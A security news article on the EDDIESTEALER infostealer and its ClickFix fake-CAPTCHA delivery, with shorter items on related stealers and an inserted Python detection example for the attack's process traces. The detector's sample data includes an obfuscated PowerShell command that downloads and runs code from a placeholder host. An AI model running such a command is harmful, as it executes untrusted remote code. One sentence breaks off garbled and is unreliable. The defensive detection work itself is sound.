A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic, initiated through fake CAPTCHA verification pages.
"This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as credentials, browser information, and cryptocurrency wallet details," Elastic Security Labs researchers said in an analysis.
The attack chain begins with the threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus CAPTCHA check pages, which prompt site visitors to prove they are "not [a] robot" by following a three-step process, a popular tactic called ClickFix.
This involves directing the potential victim to open the Windows Run dialog, paste an already-copied command into the "verification window" (i.e., the Run dialog), and press Enter. This effectively executes an obfuscated PowerShell command, resulting in the retrieval of the next-stage payload from an external server ("LLLLLLLLLLLLLLLLL[.]fit").
The JavaScript payload ("gveriffy.js") is then saved to the victim's Downloads folder and executed in a hidden window using cscript. The main goal of this intermediate script is to fetch the EDDIESTEALER binary from the same remote server and store it under a pseudorandom 12-character file name in the Downloads folder.
Written in Rust, EDDIESTEALER is a commodity stealer malware that can collect system metadata, receive tasks from a command-and-control (C2) server, and exfiltrate data of interest from the infected host. Exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps.
"These are subject to change as they are configured by the C2 operator," Elastic explained. "EDDIESTEALER then reads targeted files using standard kernel32.dll functions such as CreateFile, GetFileSizeEx, ReadFile, and CloseHandle."
The collected host information is encrypted and sent to the C2 server in a separate HTTP POST request after the completion of each task.
In addition to incorporating string encryption, the malware employs a custom WinAPI lookup mechanism to resolve API calls and creates a mutex to ensure that only one instance is running at any time. It also includes a check to determine whether it is being executed in a sandboxed environment and, if so, deletes itself from disk.
Elastic said, "Based on a similar self-deletion technique seen in Latrodectus, EDDIESTEALER is capable of deleting itself through NTFS Alternate Data Stream renaming to bypass file locks."
Another notable feature built into the stealer is the ability to bypass Chromium's app-bound encryption so that sensitive data such as cookies can be accessed. This is accomplished by incorporating a Rust implementation of ChromeKatz, an open-source tool that can dump cookies and credentials from the memory of Chromium-based browsers.
The Rust version of ChromeKatz also includes changes to handle scenarios where the target Chromium browser is not running. In such cases, it spawns a new browser instance with the command-line arguments "--window-position=-3000,-3000 https://google.com", effectively positioning the new window far off-screen and making it invisible to the user.
By spawning a browser, the malware's goal is to enable Chrome's network service so that it can read the memory associated with that child process, identified by the flag "--utility-sub-type=network.mojom.NetworkService", and ultimately extract credentials.
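The ClickFix chain (Run dialog to PowerShell to cscript) and the off-screen browser spawn described above leave distinct process-creation traces. The following is an added detection example, not code from the article or from Elastic's report: it evaluates a few heuristics over constructed Sysmon-style events (field names, paths and the sample command lines are assumptions; the URL and file names are placeholders).

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:            # one process-creation record (Sysmon EID 1-like; fields assumed)
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str

OFFSCREEN = re.compile(r"--window-position=-\d+,-\d+", re.I)            # both coordinates negative
NETSVC = re.compile(r"--utility-sub-type=network\.mojom\.NetworkService", re.I)
PS_SUSPICIOUS = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|iex|"
                           r"invoke-expression|downloadstring|iwr)", re.I)
BROWSERS = ("chrome.exe", "msedge.exe", "brave.exe")

def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (pid, rule) hits in event order; later rules may depend on earlier hits."""
    hits, offscreen_pids = [], set()
    for e in events:
        img, parent = base(e.image), base(e.parent_image)
        # ClickFix: Run-dialog launches are parented by explorer.exe; hidden/obfuscated PowerShell there is unusual
        if parent == "explorer.exe" and img in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(e.cmdline):
            hits.append((e.pid, "clickfix_run_dialog_powershell"))
        # intermediate loader: a script host running a .js straight out of the Downloads folder
        if img in ("cscript.exe", "wscript.exe") and re.search(r"\\Downloads\\[^\s\"]+\.js", e.cmdline, re.I):
            hits.append((e.pid, "script_host_js_from_downloads"))
        # ChromeKatz-style: browser started with an off-screen window position so the user never sees it
        if img in BROWSERS and OFFSCREEN.search(e.cmdline):
            offscreen_pids.add(e.pid)
            hits.append((e.pid, "browser_spawned_offscreen"))
        # the network-service child of that hidden browser is the process whose memory holds the secrets
        if img in BROWSERS and NETSVC.search(e.cmdline) and e.ppid in offscreen_pids:
            hits.append((e.pid, "network_service_child_of_offscreen_browser"))
    return hits

# Constructed sample telemetry (not real IoCs): four malicious events followed by a benign browser start.
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -ep bypass -c "iex (iwr http://placeholder.invalid/p)"'),
    ProcEvent(101, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cscript.exe", r'cscript "C:\Users\alice\Downloads\gveriffy.js"'),
    ProcEvent(102, 200, r"C:\Users\alice\Downloads\x9k2m4p7q1z3.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'chrome.exe --window-position=-3000,-3000 https://google.com'),
    ProcEvent(103, 102, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'chrome.exe --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US'),
    ProcEvent(104, 4, r"C:\Windows\explorer.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe", r'chrome.exe https://example.org'),
    ProcEvent(105, 104, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'chrome.exe --type=utility --utility-sub-type=network.mojom.NetworkService'),
]
```

The benign Chrome start and its own network-service child (pids 104 and 105) produce no hits, which is the point of tying the last rule to a parent that was itself spawned off-screen.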
Elastic said it also identified updated versions of the malware with capabilities to harvest running processes, GPU information, the number of CPU cores, the CPU name, and the CPU vendor. In addition, the new variants tweak the C2 communication pattern by sending the host information to the server before receiving the task configuration.
That's not all. The encryption key used for client-to-server communication is now hard-coded in the binary, as opposed to retrieving it dynamically from the server. In addition, the stolen terrain
The company said, "The adoption of Rust in malware development reflects a growing trend among threat actors seeking to leverage modern language features for enhanced stealth, stability, and resilience against traditional analysis workflows and threat detection engines."
The disclosure comes as c/side revealed details of a ClickFix campaign that targets multiple platforms, such as Apple macOS, Android, and iOS, using techniques such as browser-based redirections, fake UI prompts, and drive-by downloads.
The attack chain begins with an obfuscated JavaScript hosted on a website that, when visited from macOS, initiates a series of redirections to a page that guides victims to launch the Terminal and run a shell script, which leads to the download of a stealer malware flagged as AMOS.
However, the same campaign has been configured to launch a drive-by download scheme when visited from an Android, iOS, or Windows device, in order to deploy another trojan malware.
According to Nextron and Kandji, the development coincides with the emergence of new stealer malware families such as Katz Stealer and AppleProcessHub Stealer, which target Windows and macOS respectively and are capable of harvesting a wide range of information from infected hosts.
Like EDDIESTEALER, Katz Stealer is engineered to bypass Chrome's app-bound encryption, but it uses a different approach, employing DLL injection to obtain the encryption key without administrator privileges and using it to decrypt encrypted cookies and passwords from Chromium-based browsers.
"Attackers hide malicious JavaScript in GZIP files, which, when opened, trigger the download of a PowerShell script," Nextron said. "This script retrieves a .NET-based loader payload, which injects the stealer into a legitimate process. Once active, it exfiltrates the stolen data to the command-and-control server."
AppleProcessHub Stealer, on the other hand, is designed to exfiltrate user files including bash history, zsh history, GitHub configuration, SSH information, and the iCloud Keychain.
The attack sequence distributing the malware entails the use of a Mach-O binary that downloads a bash stealer script from the server "appleprocesshub[.]com" and runs it, the results of which are then sent back to the C2 server. Details of the malware were first shared by MalwareHunterTeam on May 15, 2025, and by MacPaw's Moonlock Lab last week.
"It's an example of a Mach-O written in Objective-C communicating with a command-and-control server to execute scripts," said Kandji researcher Christopher Lopez.